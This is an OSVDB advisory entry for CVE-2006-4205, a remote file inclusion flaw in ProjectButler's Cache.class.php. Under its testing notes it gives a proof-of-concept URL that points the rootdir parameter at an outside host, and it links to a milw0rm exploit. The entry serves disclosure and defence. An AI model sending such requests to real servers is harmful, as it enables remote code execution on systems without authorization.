ProjectButler Cache.class.php rootdir Variable Remote File Inclusion

2006-08-14T23:07:19
ID OSVDB:29469
Type osvdb
Reporter OSVDB
Modified 2006-08-14T23:07:19

Description

Manual Testing Notes

http://[target]/[Path]/classes/Cache.class.php?rootdir=http://cmd.gif?

References:

Related OSVDB ID: 29470 Related OSVDB ID: 29474 Related OSVDB ID: 29472 Related OSVDB ID: 29475 Related OSVDB ID: 29471 Related OSVDB ID: 29473 ISS X-Force ID: 28362 Generic Exploit URL: http://www.milw0rm.com/exploits/2183 FrSIRT Advisory: ADV-2006-3294 CVE-2006-4205 Bugtraq ID: 19503